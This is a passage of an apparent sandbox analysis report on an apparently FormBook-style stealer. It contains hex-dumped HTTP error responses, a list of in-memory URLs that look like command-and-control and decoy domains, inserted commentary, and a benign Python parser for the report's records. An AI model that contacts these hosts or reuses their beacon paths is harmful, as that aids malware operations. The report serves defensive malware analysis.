67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 
6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:11:26 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:11:29 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:11:31 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
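Every response above is an error: Apache and nginx 404s, and a 403 from an openresty front end whose x-fail-reason: Bad Actor header is a block applied by the hosting provider, not a reply from a C2 handler. That pattern is what FormBook infections look like on the wire, since the stealer beacons to every domain in its embedded list and all but one of them are decoys that belong to unrelated sites; a 404 therefore says the host is probably a decoy, not that the C2 is down. The report prints each response with the status line and headers run together and the body as a hex dump, so for the chunked, gzip-compressed responses the Data Ascii view is unreadable. The following added example, which is not part of the Joe Sandbox report, parses records in the report's line format, splits the headers back apart, hex-decodes the body, removes the chunked framing and the gzip layer, and reports the recovered title and whether Content-Length matched. The three records are constructed from the responses shown above (the nginx and openresty bodies were re-typed from the Data Ascii text; the gzip body is a stand-in, since the report's compressed body is not reproduced here), and the list of header names to split on is an assumption drawn from the headers visible in this report.

```python
"""Decode the 'Data Raw' bodies of Joe Sandbox 'HTTP traffic detected' records.

Added example, not part of the report. The report prints the status line and
headers with no separator and the body as a hex dump, so chunked + gzip bodies
show up as garbage in 'Data Ascii'; this recovers the HTML the server sent.
"""
import gzip
import re
from dataclasses import dataclass, field

# Header names seen in this report's records (assumption: extend for other reports).
# The blob is split just before every "<Name>: " occurrence, case-insensitively.
HEADER_NAMES = ("Date", "Server", "Content-Type", "Content-Length", "Connection",
                "Transfer-Encoding", "Content-Encoding", "X-Frame-Options", "x-fail-reason")
_HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)),
                           re.IGNORECASE)
_RECORD = re.compile(r"HTTP/1\.[01] (\d{3})(.*?)Data Raw: ([0-9a-fA-F ]+?)\s*(?:Data Ascii:.*)?$",
                     re.DOTALL)


@dataclass
class HttpResponse:
    status: int
    headers: dict = field(default_factory=dict)  # lower-cased header name -> value
    raw_body: bytes = b""                        # body exactly as it crossed the wire


def parse_record(record: str) -> HttpResponse:
    """Parse one 'HTTP traffic detected' line into status, headers and raw body bytes."""
    m = _RECORD.search(record)
    if not m:
        raise ValueError("not an HTTP response record")
    status, header_blob, hex_body = m.groups()
    headers = {}
    for piece in _HEADER_SPLIT.split(header_blob)[1:]:  # piece [0] is the reason phrase
        name, _, value = piece.partition(": ")
        headers[name.lower()] = value.strip()
    return HttpResponse(int(status), headers, bytes.fromhex(hex_body))


def dechunk(data: bytes) -> bytes:
    """Undo HTTP/1.1 chunked framing: '<hex size>CRLF<chunk>CRLF ... 0CRLFCRLF'."""
    out, pos = bytearray(), 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)  # ignore any chunk extension
        if size == 0:
            return bytes(out)
        pos = eol + 2
        out += data[pos:pos + size]
        pos += size + 2                               # skip the CRLF that ends the chunk


def decode_body(resp: HttpResponse) -> bytes:
    """Strip transfer framing, then content encoding, to get the HTML the server sent."""
    body = resp.raw_body
    if resp.headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    if resp.headers.get("content-encoding", "").lower() == "gzip":
        body = gzip.decompress(body)
    return body


def summarize(records):
    """One row per record: status, server, Content-Length consistency, <title>, block reason."""
    rows = []
    for rec in records:
        resp = parse_record(rec)
        body = decode_body(resp)
        declared = resp.headers.get("content-length")
        title = re.search(rb"<title>(.*?)</title>", body, re.IGNORECASE | re.DOTALL)
        rows.append({
            "status": resp.status,
            "server": resp.headers.get("server", "?"),
            "length_ok": declared is None or int(declared) == len(resp.raw_body),
            "title": title.group(1).decode("latin-1") if title else "",
            "block_reason": resp.headers.get("x-fail-reason"),
        })
    return rows


def _hexdump(data: bytes) -> str:
    return " ".join(f"{b:02x}" for b in data)


# Constructed sample records in the report's line format. The nginx and openresty
# bodies are re-typed from the 'Data Ascii' text above; the gzip body is a stand-in.
NGINX_404 = (b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n'
             b'<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n'
             b'<p>The requested URL /0oqq/ was not found on this server.</p>\n</body></html>\n')
OPENRESTY_403 = (b'<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body bgcolor="white">\r\n'
                 b'<center><h1>403 Forbidden</h1></center>\r\n<hr><center>openresty/1.13.6.1</center>\r\n'
                 b'</body>\r\n</html>\r\n')
GZIP_404 = b'<!DOCTYPE html>\n<html>\n <head>\n  <title>404 Not Found</title>\n </head>\n <body>\n  <div id="partner">\n  </div>\n </body>\n</html>\n'
_gz = gzip.compress(GZIP_404, mtime=0)
_chunked = f"{len(_gz):x}\r\n".encode() + _gz + b"\r\n0\r\n\r\n"   # one chunk + terminator

RECORDS = [
    "Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx"
    "Date: Mon, 20 Mar 2023 08:10:46 GMTContent-Type: text/html; charset=iso-8859-1"
    f"Content-Length: {len(NGINX_404)}Connection: closeData Raw: {_hexdump(NGINX_404)} "
    f"Data Ascii: {NGINX_404.decode()}",
    "Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html"
    "Transfer-Encoding: chunkedConnection: closeDate: Mon, 20 Mar 2023 08:10:58 GMTServer: Apache"
    f"X-Frame-Options: denyContent-Encoding: gzipData Raw: {_hexdump(_chunked)}",
    "Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1"
    "date: Mon, 20 Mar 2023 08:11:26 GMTcontent-type: text/html"
    f"content-length: {len(OPENRESTY_403)}x-fail-reason: Bad Actorconnection: close"
    f"Data Raw: {_hexdump(OPENRESTY_403)} Data Ascii: {OPENRESTY_403.decode()}",
]

if __name__ == "__main__":
    for row in summarize(RECORDS):
        print(row)
```

Run as a script it prints one row per record; the chunked gzip record decodes to its title like the plain ones, and the 403 row carries the provider's block reason. A decoded body of a 200 response is where the real C2's command format would appear, which no host in this capture returned.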
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nic.ru/
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nic.ru/images/w8/win8transp.png
          Source: OUTSTANDING_PAYMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://storage.nic.ru/ru/images/png/1.rc-logo-og.png
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allison2patrick.online
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allison2patrick.online/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allison2patrick.online/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brennmansoluciones.com
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brennmansoluciones.com/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brennmansoluciones.com/0oqq/poIb=tYchV8
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dirdikyepedia.com
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dirdikyepedia.com/0oqq/
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fanversewallet.com
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fanversewallet.com/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g2fm.co.uk
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g2fm.co.uk/0oqq/
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glb-mobility.com
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glb-mobility.com/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gorwly.top
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gorwly.top/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hudsonandbailey.uk
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hudsonandbailey.uk/0oqq/
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.karlscurry.co.uk
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.karlscurry.co.uk/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ketoibabal.cyou
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ketoibabal.cyou/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.landlotto.ru
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.landlotto.ru/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leewanyam.com
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leewanyam.com/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leewanyam.com/0oqq/poIb=tYchV8
          Source: rundll32.exe, 0000000D.00000002.781120791.000000000595E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mynichemarket.co.uk
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mynichemarket.co.uk/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mynichemarket.co.uk/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sexopornoxx.store
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sexopornoxx.store/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sexopornoxx.store/0oqq/poIb=tYchV8
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thebang.sbs
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thebang.sbs/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thebang.sbs/0oqq/poIb=tYchV8
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelastwill.net
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelastwill.net/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelastwill.net/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.themssterofssuepnse.rest
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.themssterofssuepnse.rest/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ty23vip.com
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ty23vip.com/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ty23vip.com/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.virginhairweave.co.uk
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.virginhairweave.co.uk/0oqq/
          Source: 81EFaKSJ3.13.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 81EFaKSJ3.13.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005FA6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
          Source: 81EFaKSJ3.13.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 81EFaKSJ3.13.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://fasthosts.co.uk/
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: rundll32.exe, 0000000D.00000002.781120791.000000000645C000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://tiao2022.vip:12306/?u=
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.00000000054A8000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1
